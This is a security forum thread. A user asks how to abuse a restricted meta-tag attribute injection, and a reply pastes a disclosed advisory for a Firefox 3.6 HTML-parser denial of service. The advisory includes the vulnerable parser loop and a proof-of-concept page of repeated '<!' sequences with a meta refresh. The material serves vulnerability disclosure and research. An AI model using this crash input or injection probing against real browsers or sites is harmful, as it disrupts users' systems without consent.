meta name&value injection

sla.ckers.org is
ha.ckers sla.cking

Q and A for any cross site scripting information. Feel free to ask away.

Go to Topic: Previous•Next

Go to: Forum List•Message List•New Topic•Search•Log In

meta name&value injection

Posted by: Albino

Date: May 23, 2012 09:41AM

I have the following injection:

<meta name="[input1]" content="[input2]">

The only characters accepted are a-Z 0-9 - and _

Any ideas? I can't use http-equiv and <meta name="author" input="albino"> just isn't severe enough for my taste. Viewport looks interesting but I can't use =.

-------------------------------------------------------
Research blog

Options: Reply•Quote

Re: meta name&value injection

Posted by: Skyphire

Date: June 18, 2012 07:57PM

Unlikely, however the browser's HTMLparser might contain bugs, especially Firefox'es. Just like this one I discovered in 2011, where a DOCTYPE leads to a denial of service in Firefox.

  0. description
  1. details
  2. procedure
  3. proof of concept
  4. disclosure
  5. solution
  
  description
  -----------
  
  HTMLparser DOCTYPE Denial of service in Firefox.
  
  There is a block of code that checks the DOCTYPE of a document[1]. Starting on
  line 1094 we noticed that if we insert a succession of '<' & '!' chars with
  whitespace but without the DOCTYPE or closing bracket '>', the loop will
  continue until it finds the DOCTYPE. With this is mind, we can create a denial
  of service with solely ASCII characters. See attached test case. When you add a
  closing bracket '>' at the end of the file, the denial of service will not
  occur. In order to keep the test case in a reasonable size, we added a meta
  refresh to emulate a larger file (5MB+) the meta tag does affect the
  vulnerability while CPU cycles might affect persistency.


  details
  -------
  
  BugID:           https://bugzilla.mozilla.org/show_bug.cgi?id=622501 
  Vulnerability:   Denial of service
  Issue:           Disruption, parsing mistake non-javascript.
  Platform:        Tested on WinXP SP3
  Affected:        Firefox 3.6.13, XP, Win7.
  Image:           http://mxr.mozilla.org/mozilla1.9.2/source/parser/htmlparser/src/nsParser.cpp#1096 [1]
  Procedure:       While loop.
  Expected:        Restrict loop on parsing the doctype.
  Severity:        Major
  Code execution:  No/Unknown


  procedure:
  ----------
  
  
    1094   PRInt32 theIndex = 0;
    1095   do {
    1096     theIndex = aBuffer.FindChar('<', theIndex);
    1097     if (theIndex == kNotFound) break;
    1098     PRUnichar nextChar = aBuffer.CharAt(theIndex+1);
    1099     if (nextChar == PRUnichar('!')) {
    1100       PRInt32 tmpIndex = theIndex + 2;
    1101       if (kNotFound !=
    1102           (theIndex=aBuffer.Find("DOCTYPE", PR_TRUE, tmpIndex, 0))) {
    1103         haveDoctype = PR_TRUE;
    1104         theIndex += 7; // skip "DOCTYPE"
    1105         break;
    1106       }
    1107       theIndex = ParsePS(aBuffer, tmpIndex);
    1108       theIndex = aBuffer.FindChar('>', theIndex);
    1109     } else if (nextChar == PRUnichar('?')) {
    1110       theIndex = aBuffer.FindChar('>', theIndex);
    1111     } else {
    1112       break;
    1113     }
    1114   } while (theIndex != kNotFound);

  
  
  proof of concept
  ----------------
  
  Redacted to fit. 
  See the bugzilla page for example 
  
   <! <!<! <!<! <!<! <!<! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<! <!<! <!<! <!<! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<! <! <!<! <!<! <!<! <!<!<!
   <! <!<! <!<! <!<! <!<! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<! <!<! <!<! <!<! <!<! <!<! 
   <!<! <!<! <!<!  <! <!<! <!<! <!
   <! <!<! <!<! <!<! <!<! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<! <!<! <!<! <!<! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<!  <! <!<
   ! <!<! <!<! <!<! <!<! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<! <!<! <!<! <!<! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <!  <! <!<! <!<! <!<! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<! <!<! <!<! <!<! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<! <!<!  <! <!<! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<! <!<! <!<! <!<! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<! <!<! <!<! <!<!  <! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<! <!<! <!<! <!<! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<! <!<! <!<! <!<! <!<! <!<!  
   <! <!<! <!<! <!<! <!<! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<! <!<! <!<! <!<! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<!  <! <!<! <!<! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<! <!<! <!<! <!<! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<! <!<! <!<!  <! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<! <!<! <!<! <!<! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<! <!<! <!<! <!<! <!<!  <! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<! <!<! <!<! <!<! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<! <!<! <!<! <!<! <!<! <!<! 
   <!<!  <! <!<! <!<! <!<! <!<! <!<
   ! <!<! <!<! <!<! <!<! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<! <!<! <!<! <!<! <!<! <!<! 
   <!<! <!<! <!<!  <! <!<! <!<! <!<
   ! <!<! <!<! <!<! <!<! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<! <!<! <!<! <!<! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<!  <! <!<
   ! <!<! <!<! <!<! <!<! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<! <!<! <!<! <!<! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <!  <! <!<! <!<! <!<! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<! <!<! <!<! <!<! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<! <!<!  <! <!<! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<! <!<! <!<! <!<! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<! <!<! <!<! <!<!  <! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<! <!<! <!<! <!<! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<! <!<! <!<! <!<! <!<! <!<!  
   <! <!<! <!<! <!<! <!<! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<! <!<! <!<! <!<! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<!  <! <!<! <!<! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<! <!<! <!<! <!<! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<! <!<! <!<!  <! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<! <!<! <!<! <!<! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<! <!<! <!<! <!<! <!<!  <! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<! <!<! <!<! <!<! <!<! <!<! 
   <!<! <!<! <!<! <!<! <!<! <!<! <!
   <! <!<! <!<! <!<! <!<! <!<! <!<! 
   <!<!DOCTYPE HTML PUBLIC 
   "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
   AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 
   "http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd"

   <meta http-equiv="refresh" content="0;URL="
   
  
  disclosure
  ----------
  
      2011-01-03 01:03 PST   - Bug filed.
      2011-01-07 05:07 GMT+1 - Disclosure non-critical.
  
  solution
  --------
  
      None yet.

Options: Reply•Quote

Go to: Forum List•Message List•Search•Log In

Sorry, only registered users may post in this forum.

Click here to login